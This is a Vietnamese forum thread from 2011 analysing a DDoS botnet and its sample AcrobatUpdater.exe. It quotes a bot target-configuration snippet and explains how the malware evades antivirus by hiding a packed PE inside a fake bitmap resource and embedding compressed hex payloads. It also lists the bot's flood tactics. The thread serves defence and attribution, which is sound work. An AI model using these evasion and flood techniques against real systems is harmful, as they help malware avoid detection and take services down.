[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 11:32:29 (+0700) | #15 | 243909
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
@TQN: cứ để họ ra bot mới anh ạ. Lại có sample và tiếp tục RCE. STL nếu làm các bot này, nói 1 cách khách quan là khá hiệu quả vì các lý do sau:

- Không bị AV phát hiện: Hầu hết như thế, cứ bot nào mới ra là chả AV nào bắt được mặc dù các công nghệ Emulator hay Heuristic theo quảng cáo của các hãng là cũng ghê gớm lắm. Có thể là chém gió chăng ??

- Bot hoạt động hiệu quả: Chỉ cần sửa file cấu hình là bot có thể dừng hoặc tấn công ngay lập tức. Tấn công ồ ạt với số lượng lớn. Mặc dù server đã có các phương án bảo mật khá công phu nhưng họ vẫn đạt mục đích.

Nói thế không phải là khen họ giỏi hay tài, nhưng nhìn ở góc độ kĩ thuật thì phải công nhận là hiệu quả.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 11:33:37 (+0700) | #16 | 243910
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tui thì không đứng về bên nào cả, bên nào làm sai thì lên tiếng đã kích. "Trong chính có tà, trong tà có chính", như Đông Phương Bất Bại hồi xưa thôi.

Việc STL là của ai, ai nuôi, ai ra lệnh thì tới bây giờ vẫn nằm trong vòng bí mật, có người biết cũng không dám nói. Bổn phận của chúng ta, dân làm IT, kỹ thuật, chỉ nên đơn thuần phân tích, RE, truy lùng dấu vết của tụi nó. Còn việc sau đó nữa thì có người khác lo, hay không lo thì cũng phải chịu.

Nếu chỉ vì sợ hãi tui nó hay thế lực đứng sau tụi nó mà chúng ta phải im lặng trước các hành động dơ bẩn, thối nát, không giống ai, không giống nước nào trên thế giới (trừ vài nước) thì chính ta đã vô tình im lặng, tiếp tay cho chúng phá hoại nền IT, cuộc sống, Internet của nước nhà, chính là tiếp tay cho tội ác.

Tới bây giờ, chúng ta vẫn làm đúng, vẫn không đụng chạm đến ai cả. Nếu có ai đó hô lên, ê, tụi HVA kia, mày đụng chạm đến tao thì chính hắn đang phơi bày bộ mặt thật, chân tướng thật của hắn, của thế lực đứng sau hắn ra.

Chỉ mong các admin HVA chân cứng đá mềm, tiếp tục đấu tranh chống lại đại dịch này.

Còn về tại sao các mẫu bot của tụi nó vẫn không bị phát hiện, theo ý em:
1. VN ta là vùng trũng về IT của thế giới. Các tổ chức bảo mật, AVs nghe tới VN ta là ngán, là lơ luôn. Sống chết mặc bay.
2. Có bao nhiêu người dùng có bản quyền của các AVs để upload mẫu mà họ nghi ngờ lên các AVs đấy. Toàn là dùng cờ rắc, dùng key chùa, key lậu. Có bao nhiêu người dùng có khả năng phân tích kỹ thuật để nghi ngờ file đó là STL's "mèo què".
3. Sự "nổ", sự thổi phồng quá đáng, sự im lặng, bao che của nhiều tổ chức An ninh mạng, các AVs trong nước có thẩm quyền. Đôi khi họ muốn diệt, nhưng vì lý do gì đó mà họ không được diệt đám "mèo què" này.
4. Sự vô cảm, sống chết mặc bay. Em bỏ công lên các forum em tham gia, hô hào bà con tự tìm diệt, up mẫu, vậy mà chỉ nhận được các reply vô cảm cực kỳ, đông ke !

Tới bây giờ, em mới thấy buồn và nãn cho cái nghề IT, nền IT của nước nhà. Em bỏ nghề là đúng !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 11:41:10 (+0700) | #17 | 243911
tran_tien
Member
[Minus] 0 [Plus]
Joined: 28/05/2005 09:40:09
Bài gởi: 16
Đến từ: AFCVN
Offline
[Profile] [PM] [WWW]
Chỉ không hiểu lý do mà trong list nạn nhân, lại thấy có cả blogspot.com và wordpress.com ? Attacker ko hiểu đc là khó có thể takedown các địa chỉ này sao ?

//. Các bác độc giả độc giếc của cái mớ gì đó, đừng lái topic theo quan điểm chính trị của các bác nhé, topic theo em là thuần kỹ thuật.
Ngoại trừ bạn đến từ một hành tinh xa xôi, thông tin "Từ" của bạn quá dài.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 11:54:20 (+0700) | #18 | 243912
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Để chống lại các STL bot kiểu này, em chỉ chợt nghỉ vài ý kiến này:
1. Các user phải cài firewall chặn và lọc các gói tin đi ra.
2. Cập nhật và dùng các AVs nổi tiếng trên thế giới, đừng dùng các AV "nổ", không chừng dùng các AV "nổ" đó còn nuôi dưỡng thêm cho đám STL's "mèo què"
3. Patch trình duyệt của mình đang dùng để UserAgent là random string. Cái này thì hơi khó với user bình thường.
4. Kiểm soát chặc chẽ các autoruns. Cái nào nghi ngờ thì upload lên VirusTotal, CWSandbox, ThreadExpert ngay.

Còn về phía server thì có mấy anh admin lo, em không biết smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 12:11:12 (+0700) | #19 | 243913
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
Em có ý kiến thế này, hiện tại e cũng đang làm 1 site 1 ngày có khoảng 100k lượt truy cập.
Em muốn giúp đỡ mọi người - những người dính bot bằng cách lất IP của client xem web em và so sánh với đống IP mà HVA đã public. Ông nào nằm trong dải IP đó thì sẽ được suggest chạy 1 phần mềm kiểm tra và diệt hết cái đống virus của STL.

Về phần mềm kiểm tra thì em không có khả năng viết rồi, vậy nhờ anh TQN hoặc ai đó viết vậy. Tốt nhất là có thể update được (phòng khi STL ra mẫu mới thì quất luôn).

Mong được góp chút sức.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 12:20:54 (+0700) | #20 | 243914
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Cảm ơn lequi ! Chỉ cần các AVs update và diệt các con bot của STL thì hiệu quả hơn ct của tui viết hàng trăm lần (lâu rồi không code, lụt nghề rồi), Bạn nên phổ biến tin tức các file bot đấy trên website của bạn để bà con tự tìm diệt = tay hay AV.
2 acoustics89: Giỏi cái cục xxx. Source mấy cái VB class đó có đầy trên mạng. Vd: Google mấy cái cxxx gì đ1o trong AcrobatUpdater.exe là ra ngay. Tụi STL chỉ là tụi đạo code, copy & paster thôi. Còn kỹ thuật mới thì có đám quan thầy ngoại bang của tụi nó đút, mớm cho. Em nói đúng không mấy anh STL, có thấy nhục không ?????
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 12:21:30 (+0700) | #21 | 243915
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Em có thể code 1 cái tool để hỗ trợ việc remove mẫu này khỏi máy. Đợi mấy hôm nữa em up.
Vì mẫu chạy trên win nên tool cũng chỉ chạy trên win thôi
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 12:35:30 (+0700) | #22 | 243916
lequi
Member
[Minus] 0 [Plus]
Joined: 29/04/2007 18:13:32
Bài gởi: 77
Offline
[Profile] [PM]
@TQN: Em cũng có dịp đi sửa máy cho vài người bạn, người thân. Đa phần là họ không rành rọt mấy về AV. Nếu mình làm 1 phần mềm chỉ cần họ Run 1 cái, chạy chạy mấy cái progress bar, quét xong hiện cái thông tin đã diệt được em abcd xyz gì đó là họ đã vui lắm lắm rồi. Đợi mấy AVs update thì lúc đó đám STL lại sinh ra mẫu khác thì mình khó chủ động smilie.

Site em chuyên về giải trí, nên số người biết đến vấn đề này chắc cũng không nhiều. Em có thông báo thì cũng không mấy ngừời biết đường diệt.

@acoustics89: Nếu vậy thì tuyệt quá, ông a code sớm sớm tý, em suggest 1 vài chức năng cần thêm như:
- Tự động cập nhập
- Có thể chạy trên windows 7, không biết virus của tụi này có chạy được trên win 7 không, vì win 7 em đang dùng phân quyền khá tốt, mún thao tác trong ổ C (thư mục program files) và registry đều phải dưới quyền administrator.
- Sau khi quét xong nếu máy đang kết nối internet thì sẽ report "Đã quét được xxxx virus, IP: xxx.xxx.xxx.xxx, tên virus này nọ". Có thể chức năng này không cần, nhưng biết đâu sau này nó sẽ có ích.
- Thêm nữa là chặn luôn mấy URL, IP nghi ngờ của đám STL.

Em xin hết.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 14:10:13 (+0700) | #23 | 243919
totden
Member
[Minus] 0 [Plus]
Joined: 07/10/2008 02:37:47
Bài gởi: 17
Offline
[Profile] [PM]
Theo em nghĩ là không nên viết tool, trước e thấy có mấy vụ post tool đã fake lên rồi.
Con này mới build, vậy nhờ bot nào để nó phát tán nhanh dữ vậy, có cách nào phát hiện để dẹp nó tận gốc đc ko ah?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 15:53:48 (+0700) | #24 | 243922
texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
http://www.threatexpert.com/report.aspx?md5=d517e448e15f3ea3b0405b7679eccfd7

Mình thấy trên Threatexpert rồi, không biết KIS submit hay là TQN or Conmale submit.

Btw, với việc đưa lên đây thì các trình AV sẽ update nhanh thôi, tốt hơn nhiều so với việc viết cái tool remove nó.


Giá mà BKAV update nhanh thì tốt, vì BKAV rất phổ biến ở các Computers của nhà nước (một số lượng khá lớn). smilie

------------------------------------------------------------------------------

Bạn AVIRA sẽ đưa cái này vào bản update tiếp theo (chắc ngày mai) - Avira ở VN dùng hơi nhiều:


AcrobatUpdater.exe MALWARE

The file 'AcrobatUpdater.exe' has been determined to be 'MALWARE'.Our analysts named the threat .The term "TR/" denotes a trojan horse that is able to spy out data, to violate your privacy or carry out unwanted modifications to the system.Detection will be added to our virus definition file (VDF) with one of the next updates.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 20:16:41 (+0700) | #25 | 243928
[Avatar]
tmd
Member
[Minus] 0 [Plus]
Joined: 28/06/2006 03:39:48
Bài gởi: 2951
Offline
[Profile] [PM]
Cách upload mẫu ;
Avirar : đơn giản về hiệu quả nhanh
vào trang http://analysis.avira.com/samples/index.php, điền thông tin cá nhân và upload mẫu, đợi báo cáo.

Kaspersky các loại phiên bản và phiên bản cờ Vietnamese
http://support.kaspersky.com/virlab/helpdesk.html Đọc và làm theo hướng dẫn.

Mcafee
https://www.webimmune.net/ Đọc và làm theo hướng dẫn.

Dành cho những ai sài các gói phần mềm an ninh của Microsoft kể cả free và commercial
https://www.microsoft.com/security/portal/Submission/Submit.aspx

http://www.mywot.com/wiki/Malware_submission
3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 21:03:13 (+0700) | #26 | 243930
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
File config mới của tụi STL này tại host direct.aliasx.net giờ đã xoá hết các host target ở cuối file, chỉ còn lại dòng trêu chọc này:
Code:
<targets>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="Postmodenism_tiep_tuc_viet_ky_su.[^.^]" port="80" uri="/" keepCookies="1" crawling="1" referer=""/>
</targets>

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 21:27:27 (+0700) | #27 | 243932
[Avatar]
xnohat
Moderator
Joined: 30/01/2005 13:59:19
Bài gởi: 1210
Đến từ: /dev/null
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!] [MSN]
Đã submit thêm lên Microsoft

https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1

-------------------------------

Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là redirect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control
iJust clear, "What I need to do and how to do it"/i
br
brBox tán gẫu dời về: https://www.facebook.com/hvaonline
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 21:35:20 (+0700) | #28 | 243933
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Em vừa mới quét thử penop.net thì thấy nó down rồi, không lấy top.jpg được.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 22:41:22 (+0700) | #29 | 243934
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
Giống hệt hồi trước mà anh, cứ dùng xong là lại disable cái penop. Bây giờ tiếp tục chờ đợi vậy
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 04:47:26 (+0700) | #30 | 243937
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
TQN wrote:
Tui thì không đứng về bên nào cả, bên nào làm sai thì lên tiếng đã kích. "Trong chính có tà, trong tà có chính", như Đông Phương Bất Bại hồi xưa thôi.

Việc STL là của ai, ai nuôi, ai ra lệnh thì tới bây giờ vẫn nằm trong vòng bí mật, có người biết cũng không dám nói. Bổn phận của chúng ta, dân làm IT, kỹ thuật, chỉ nên đơn thuần phân tích, RE, truy lùng dấu vết của tụi nó. Còn việc sau đó nữa thì có người khác lo, hay không lo thì cũng phải chịu.

Nếu chỉ vì sợ hãi tui nó hay thế lực đứng sau tụi nó mà chúng ta phải im lặng trước các hành động dơ bẩn, thối nát, không giống ai, không giống nước nào trên thế giới (trừ vài nước) thì chính ta đã vô tình im lặng, tiếp tay cho chúng phá hoại nền IT, cuộc sống, Internet của nước nhà, chính là tiếp tay cho tội ác.

Tới bây giờ, chúng ta vẫn làm đúng, vẫn không đụng chạm đến ai cả. Nếu có ai đó hô lên, ê, tụi HVA kia, mày đụng chạm đến tao thì chính hắn đang phơi bày bộ mặt thật, chân tướng thật của hắn, của thế lực đứng sau hắn ra.

Chỉ mong các admin HVA chân cứng đá mềm, tiếp tục đấu tranh chống lại đại dịch này.

Còn về tại sao các mẫu bot của tụi nó vẫn không bị phát hiện, theo ý em:
1. VN ta là vùng trũng về IT của thế giới. Các tổ chức bảo mật, AVs nghe tới VN ta là ngán, là lơ luôn. Sống chết mặc bay.
2. Có bao nhiêu người dùng có bản quyền của các AVs để upload mẫu mà họ nghi ngờ lên các AVs đấy. Toàn là dùng cờ rắc, dùng key chùa, key lậu. Có bao nhiêu người dùng có khả năng phân tích kỹ thuật để nghi ngờ file đó là STL's "mèo què".
3. Sự "nổ", sự thổi phồng quá đáng, sự im lặng, bao che của nhiều tổ chức An ninh mạng, các AVs trong nước có thẩm quyền. Đôi khi họ muốn diệt, nhưng vì lý do gì đó mà họ không được diệt đám "mèo què" này.
4. Sự vô cảm, sống chết mặc bay. Em bỏ công lên các forum em tham gia, hô hào bà con tự tìm diệt, up mẫu, vậy mà chỉ nhận được các reply vô cảm cực kỳ, đông ke !

Tới bây giờ, em mới thấy buồn và nãn cho cái nghề IT, nền IT của nước nhà. Em bỏ nghề là đúng !


Đừng nản em.

Ở thời điểm này, có rất nhiều người đồng cảm với việc làm của mình và cũng có rất nhiều người phỉ nhổ những trò tồi bại nhưng họ không công khai biểu lộ. Nếu mình không làm thì có lẽ chẳng có ai làm hết.

Những biện pháp mình làm ở đây đa phần nằm trong diện "reactive" chớ không phải "proactive" bởi vì mình chẳng có một cơ quan hoặc tổ chức nào để nhờ cậy hết. Tuy vậy, nó cũng góp phần làm sạch một phần nào đó tính nhớp nhúa. Biện pháp duy nhất là cảnh sát Canada, FBI Mỹ và nhà nước VN phối hợp thộp cổ đám phá hoại trong bóng tối này và cho mỗi ông một chục xấp lịch để đếm là yên chuyện.
What bringing us together is stronger than what pulling us apart.

texudo
Member
[Minus] 0 [Plus]
Joined: 20/07/2011 11:14:04
Bài gởi: 31
Offline
[Profile] [PM]
Đây là một việc cực kỳ nghiêm trọng, một mạng botnet khổng lồ được thiết lập ở Việt nam. Vậy mà chẳng cơ quan có thẩm quyền, báo chí nào lên tiếng cho bà con biết nhỉ.

Thiệt là lạ quá, có chăng TQN & HVA team đang một mình chống lại thế lực với ảnh hưởng lớn, khống chế cả giới truyền thông chăng.

Các ISP của Việt nam nữa, mình nghĩ là họ biết các thuê bao của họ đã bị nhiễm một loại malware dùng để tấn công DDOS, nhưng có vẻ họ không muốn lên tiếng.

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 09:10:49 (+0700) | #32 | 243943
fuga
Member
[Minus] 0 [Plus]
Joined: 27/03/2010 17:46:41
Bài gởi: 3
Offline
[Profile] [PM]
Bách Khoa Antivirus đã diệt được con này chưa anh em? Theo nhận định của anh comale thì phần lớn xuất phát từ IP Việt Nam thì cái BKAV hàng Việt sao ko ưu tiên diệt triệt để mấy con trong nước loại này nhỉ?

(à mà nghĩ lại. Cũng có thể chờ 1 thời gian khi HVA bị dập te tua lúc đó vụ này to lên [/b]báo chí[/b] lên tiếng để PR BKAV đã diệt được con này, mọi người nhớ mua key pro nghe ...) .Thay vì đăng những tin như thế này trong mục CNTT để phòng chống thì đua nhau đăng bài tablet, công nghệ cao và vô số cái từ dễ gây hiểu nhầm trong dấu nháy ' cực kì phản cảm.

cho mình hỏi thêm: loại này nó lây nhiễm qua nguồn nào(và bằng cách nào, lỗ hổng bảo mật nào?) mà số lượng đông đảo vậy? (ví dụ chương trình giả mạo unikey, nhiễm trực tiếp qua website abc.com)
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 09:12:01 (+0700) | #33 | 243944
phanledaivuong
Member
[Minus] 0 [Plus]
Joined: 23/05/2008 17:34:21
Bài gởi: 315
Đến từ: /dev/null
Offline
[Profile] [PM] [WWW]
acoustics89 wrote:
STL sử dụng bot này tấn công theo hành vi duyệt web của người bình thường, thật là không đỡ được.
Kĩ thuật sử dụng trong Bot này khá hay, hiện tại em chưa nghĩ ra cách gì để chống lại. Các bác admin có hướng nào để phòng trống không? Nó giả danh 1 người dùng nhé

p/s: @phanledaivuong : Government nào thì không biết chứ Government của VN chắc chắn chả bao giờ làm thế. Như bản thân mình thì mình cũng không thích trang danlambaovn và chả bao giờ đọc.


Government China bạn ạ ^^.

TQN wrote:
File config mới của tụi STL này tại host direct.aliasx.net giờ đã xoá hết các host target ở cuối file, chỉ còn lại dòng trêu chọc này:
Code:
<targets>
<item enabled="0" threads="5" delay="5" method="GET" protocol="http" host="Postmodenism_tiep_tuc_viet_ky_su.[^.^]" port="80" uri="/" keepCookies="1" crawling="1" referer=""/>
</targets>



Bọn STL này hình như hết việc để làm, việc anh conmale có là Postmodenism hay không thì không ảnh hưởng đến "diễn biến hoà bình" của việt nam, cũng không như làm cho Stalin sống lại đề xâm lược được 1 loạt các nước đông âu. LOL


PS: Hiện tại em đang ra quán net choi DotA, vô getdota.com download cái map 7Mb thì 1 click chuột là xong mà vào hva bằng giao thức http thì không vào được, cuối cùng dùng https thì chậm như rùa bò, chắc vẫn bị DDoS.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 09:27:19 (+0700) | #34 | 243945
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
texudo wrote:
Đây là một việc cực kỳ nghiêm trọng, một mạng botnet khổng lồ được thiết lập ở Việt nam. Vậy mà chẳng cơ quan có thẩm quyền, báo chí nào lên tiếng cho bà con biết nhỉ.

Thiệt là lạ quá, có chăng TQN & HVA team đang một mình chống lại thế lực với ảnh hưởng lớn, khống chế cả giới truyền thông chăng.

Các ISP của Việt nam nữa, mình nghĩ là họ biết các thuê bao của họ đã bị nhiễm một loại malware dùng để tấn công DDOS, nhưng có vẻ họ không muốn lên tiếng.




Quả là chưa thấy có ISP nào ở VN lên tiếng nhưng thật ra đã có vài anh em HVA làm việc cho một vài ISP đã ngỏ ý muốn giúp điều tra, đặc biệt là anh em làm cho FPT.

Phải nói rằng con bot của STL khá "smart" bởi vì nó áp dụng một số nguyên tắc cần thiết của HTTP để tạo độ tàn phá ở mức cao nhất đó là:
- Thay đổi "User-Agent"
- Sử dụng keep-alive
- Lưu dụng cookie để bảo trì sessions.
- Crawling (như crawlers) để tạo biến thiên cho các requests.

Từ thời "vecebot" một số tính năng nhận chỉ thị từ xml có khả năng thay đổi "user-agent", áp dụng chiến thuật cho cookie và referer, con bot mới này dựa trên căn bản cũ và có những khả năng mới hơn và tàn phá nhiều hơn. Tuy vậy, chính giới hạn của HTTP và những ứng dụng thêm về session khiến cho sự tàn phá vẫn bị giới hạn ở góc độ kỹ thuật.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 10:53:55 (+0700) | #35 | 243952
[Avatar]
KHUNG LONG
Member
[Minus] 0 [Plus]
Joined: 18/01/2005 13:28:51
Bài gởi: 125
Đến từ: TP.HCM
Offline
[Profile] [PM]
xnohat wrote:
Đã submit thêm lên Microsoft

https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1

-------------------------------

Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là redirect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control


Sáng nay, thử scan lại thì không diệt được vì bản cập nhật ngày 22/07/2011. smilie Nên Manual cập nhật lên bản mới ngày 23/07/2011 thì kết quả là:




He He He vậy là Microsoft Security Essentials đã kill được con này rồi. Good Job.

Thank you anh TQN nhiều và admin HVA.

-Chình lại tháng cho đúng, thanks latlabao! smilie
XOR
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 12:15:43 (+0700) | #36 | 243958
hanh_bk
Member
[Minus] 0 [Plus]
Joined: 18/08/2004 02:25:07
Bài gởi: 1
Offline
[Profile] [PM]
Chào các bác, hôm rồi bên em cũng bị DDOS với cường độ khá mạnh, file tcpdump em đưa ra đây:
http://www.mediafire.com/?r3mt1znr1tjhkmf
File này em capture trong có vài chục giây đó.
sau khi bị được 30' thì bên VDC báo là ngập toàn bộ mạng Core, bác nào hiểu cho em vài cái phân tích của vụ này với.
Không biết sao dạo này các vụ botnet xảy ra nhiều thế không biết.
Em post bài này ở đây nếu có gì không phải các mod/admin move hộ em đến chỗ nào mà phù hợp giúp em.
Thanks các bác.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 12:33:26 (+0700) | #37 | 243964
latlaobao
Member
[Minus] 0 [Plus]
Joined: 24/06/2011 08:50:43
Bài gởi: 11
Offline
[Profile] [PM]
KHUNG LONG wrote:
xnohat wrote:
Đã submit thêm lên Microsoft

https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=61a88685-cf9e-46c6-9598-ba63aac7fefa&n=1

-------------------------------

Nếu có ý định lọt vào các máy chủ điều khiển thì thứ sẽ làm không phải là redirect các luồng DDoS về "motherland" mà ra lệnh cho lũ bot down về một cái malware remover và một cái firewall dc remote control


Sáng nay, thử scan lại thì không diệt được vì bản cập nhật ngày 22/11/2011. smilie Nên Manual cập nhật lên bản mới ngày 23/11/2011 thì kết quả là:




He He He vậy là Microsoft Security Essentials đã kill được con này rồi. Good Job.

Thank you anh TQN nhiều và admin HVA.


Hôm nay mới 23 tháng 7 mà đã có bản cập nhật ngày 23/11 rồi à? Microsoft đúng là đi trước thời đại smilie
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 23/07/2011 13:05:31 (+0700) | #38 | 243967
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Em chỉ đứng theo phương diện một coder code ra 1 ct, em đã có thể khẳng định, chỉ có 1 STL duy nhất, gồm nhiều team. Mỗi team thì lung tung thành phần, trình độ. Team thì lo code bot, team thì lo code keylog, team thì lo gởi mail dụ victim, team thì lo up virus lên các site download, team thì lo đăng ký, bảo trì host phân phát "mèo què".
Xuyên suốt đám "mèo què" của STL mà em thu thập được, em rút ra ý kiến này: các anh đã lạm dụng zlib quá, đâm ra nó chính là bằng chứng chỉ mặt các anh. Gần đây các anh còn chơi trò mạo danh bmp nữa chứ.
Lúc đầu em hơi phân vân, em nghĩ có 2 nhánh cùng mang tên STL à. Tới giờ này, sau khi phân tích xong AcrobatUpdater.exe ra, em xin kết luận, các anh là một, cùng một cha mẹ cả, chỉ khác là cha mẹ đó có nhiều con thôi.
Em nói đúng không mấy anh STL, mấy anh đừng chối nhé. Bằng chứng rành rành rồi đó. Zlib.lib và Zlib.dll chính là điểm chung của các anh, và đấy cũng là bằng chứng nhận dạng các anh.
Vd nhỏ này nhé: File AcrobatUpdater.exe của các anh đã dùng tới 2 kỹ thuật mới:
1. Mạo danh Bmp Resource: Bitmap Resource với ID = 1 của các anh là bằng chứng. Mạo danh Bmp để qua mặt các AV, nhưng data của Bmp ResID 1 đó chỉ có cái BmpHeader là hợp lệ thôi, còn toàn bộ Bmp Lines Data thì các anh nhúng PE vào. Cái này sao giống Fake_Unikey vậy ha ?
2. File PE DLL nhúng trong Bmp ResID 1 extract ra là 1 dll, pack = UPX, upx -d thì lòi ra nó chính là zlib.dll, ver 1.1.4.0. Các anh sợ extract nó ra System32 đụng zlib.dll nào đó đang run nên các anh đổi tên nó thành jarlib.dll à ?
3. Một loạt các "mèo què" của các anh, từ Nguyễn Văn Lý, Tin Lành, Fake_Unikey, vecebot, daoxx.. các anh đều dùng zlib api và buid với zlib static library, gần như 100%. Signature chình ình ra đó, các anh search thử string "zlib" trong mấy file "mèo què" mấy anh đã build là thấy. Chỉ có AcrobatUpdater.exe này, VB không dùng static lib của C/C++ được nên các anh phải nhúng Zlib dll vào và extract ra, LoadLibrary, GetProcAddress để call. Dựa trên signature này + zlib signature em tự build + PatchDiff2 plugin, em đã vạch mặt, chỉ danh các anh rồi.
Tiết lộ vớ mấy anh STL; em code VB từ hồi năm 1995 lận, từ hồi VB 1 với sách của Peter Norton lận. Sách Hardcore VB của MS Express, tác giả là thằng cầu thủ gì đó của MS thì em đọc nát rồi.

Em nói đúng không các anh STL, em nói vầy các anh tâm phục khẩu phục chưa ? Các anh có code "mèo què" tới cỡ nào em cũng biết được thằng nào trong team của các anh code.
Các anh nghỉ dân VN này dốt lắm à, dể để các anh xỏ mũi lắm à ?

Đi đâu cũng về La mã, khi xưa BKAV đạo code dùng Rar.exe để nén data gởi lên, bây giờ các anh dùng zlib để unzip data nhận về. Sao trùng hợp vậy ha ?

Kỹ thuật mới mà các anh dùng để qua mặt các AV là thay vì chơi nguyên xi PE file vào resource, các anh dùng các xZip để nén các file PE lại, dùng các tool bin2db để convert toàn bộ file zip đó ra hex string, rồi mang toàn bộ hex string array đó vào ct, nhúng ở .data hay .rdata section. Khi run, các anh extract đống datađ ó ra %Temp% file, dùng Zlib function để uncompress nó rồi run file PE đó.
Điển hình: DrWatson.exe của mấy anh, đúng không mấy anh STL ? Kỹ thuật này cũng hiệu quả đấy chứ, ít được dùng và ít phổ biến trong giới "mèo què" quờ rai tờ, qua mặt được các AV smilie

Em đùa tí nhé cho bớt "sờ trít": Nếu các anh chường mặt rao bán các "mèo què", bot của các anh, em sẽ vạch mặt các anh đạo code, vi phạm bản quyền liền.
Em nói mấy anh STL đừng tức nhé, em biết trong team các anh có các bác bằng tuổi ba em, như bác Xxxx gì đó. Nhưng tức thì chịu chứ sao bây giờ, mấy anh làm bậy, làm bẩn mà !!!???

Bitmap gì mà tự dưng không không nhúng vô vầy nè, chả có hình thù gì cả




Mang vào 010Editor với BmpTemplate thử xem:




À, chơi nhúng PE với BmpInfo Header mạo danh à, extract ra thử xem:




UPX à, quá dễ, upx -d xem sao. OK, không phải UPX modified, unpack ngon lành. Xem version info của nó xem sao:




Ặc ặc, lại Zlib nữa, nhưng không sao, thằng này chơi DLL nên dể RCE, nó chỉ dùng 3 hàm của zlib: gzopen, gzunxxx gì nữa vậy bà con RCE ?

